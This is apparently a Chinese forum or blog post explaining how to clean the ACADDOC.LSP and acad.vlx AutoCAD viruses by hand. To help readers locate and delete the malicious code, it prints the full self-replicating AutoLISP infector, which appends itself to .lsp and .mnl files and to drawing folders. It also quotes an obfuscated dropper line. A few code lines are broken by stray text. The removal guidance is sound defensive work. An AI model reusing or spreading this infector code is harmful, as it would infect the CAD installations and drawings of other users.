第一步 查杀.lsp病毒
CAD的病毒很多但都大同小异。现就出现的ACADDOC.LSP病毒进行杀毒。不用重新安装CAD的办法。
1、发现文件夹中多出ACADDOC.LSP说明你中毒了。
2、关闭CAD程序。
3、全盘查 *.fas *.lsp *.mnl *.arx文件,除了CAD安装目录以外的全部删除。
4、检查CAD安装目录文件的修改时间,把最近的几个文件中的病毒代码删除。(用记事本打开)
5、把CAD安装目录中的所有*.fas *.lsp *.mnl *.arx文件改为只读属性。
说明:
1、ACADDOC.LSP病毒感染X:\Program Files\AutoCAD 20**\Support文件夹下的3d.lsp;3darray.lsp;acad2010.lsp;acad2010doc.lsp;acadinfo.lsp;ai_utils.lsp;attredef.lsp;edge.lsp;mvsetup.lsp;sample-profile-util.lsp文件。
2、要删除的病毒代码在文件的尾部,具体如下:(删除技巧:选中病毒代码的前几段——复制——编辑
菜单——查——粘贴——查下一个。定位后从定位点到文件末尾全部选中然后删除,病毒代码删除后记得把文件改为只读。)
(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(progn
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
);while
(close wjm1)
);progn
);if
(if flag1
(progn
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(progn
(write-line text wjm1)
);progn
);if
);while
(close wjm1)
(close wjm)
);progn
);if
);defun
(setvar "cmdecho" 0)
(setq acadmnl (findfile "l"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile ""))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(progn
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
怎么把隐藏的文件显示出来(setq mnln (1+ mnln))
);while
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
);while
);progn
);if
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename
1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
);while
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
);while
(setq mnln (1+ mnln))
);while
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
);while
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))
(app lspfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
);while
(setq lspn (1+ lspn))
(load "acadapq")
(princ)
第2步 查杀acad.vlx病毒
1. 仔细搜索查看CAD安装目录后会发现Express目录的acetauto.lsp文件和Support目录的ai_utils.lsp文件都被修改了。同时Help目录内也多出了一个logo.gif文件,仔细查看它的字节大小,确定它就是这个acad.vlx文件的副本。
2.打开acetauto.lsp和ai_utils.lsp文件,跟安装原文件对比后发现,它们都被添加了一行代码:(vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))
这句代码的意思就是搜索CAD支持路径下是否有logo.gif文件,如有,则复制logo.gif文件到CAD支持路径并重命名为acad.vlx。这就是为什么全盘搜索acad.vlx删除后,打开CAD后又会全新生成这个acad.vlx文件的原因了。
3.关闭CAD,全盘搜索acad.vlx删除,再将CAD的Help目录内的logo.gif文件删除即可
4.首先到这个目录C:\Documents and Settings\DN016\Application Data\Autodesk\AutoCAD 2009\R17.2\chs\Support,其中dn016是我的用户名,我用的是2009版本,R17.2也是2009的版本号,如果你是2007的,那么这个目录应该是C:\Documents and Settings\×××(用户名)\Application Data\Autodesk\AutoCAD 2007\R17\chs\Support,以此类推哈不到这个文件夹的,请注意看看你的系统是否可以查看隐藏文件,是否可以查看系统文件,即在“文件夹选项”里,去掉“隐藏受保护的系统文件”的勾,同时显示隐藏文件(注,如果这个你不懂,可以上网查查相关资料)到文件夹之后,同时到acad.vlx这个文件,彻底删除这个文件,怎么叫彻底删除??那就是shift+del,这个懂了吧。删除之后,创建一个acad.vlx的空白文件(只读),ok,完成,别忘了把你的cad文件文件夹里的acad.vlx给删除了总之,我的处理办法就是,除了support文件夹能有一个0字节的acad.vlx文件之外,不能有其他的acad.vlx文件,尤其是,如果这个acad.vlx文件是4kb,千万要删除。
5.再打开acetauto.lsp和ai_utils.lsp文
件,(C:\Program Files\AutoCAD 2007\Support)删除下面代码(如果没有就不不管他,但文件的属性要改为只读)
(vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))
6.再将CAD的Help目录内的logo.gif文件删除即可。
最后建议大家在安装CAD时尽量不用安装而是用Bin文件夹中的acad.msi安装,安装后第一时间把安装目录中的文件都改为只读,这样可以预防大多数的CAD病毒。
发布评论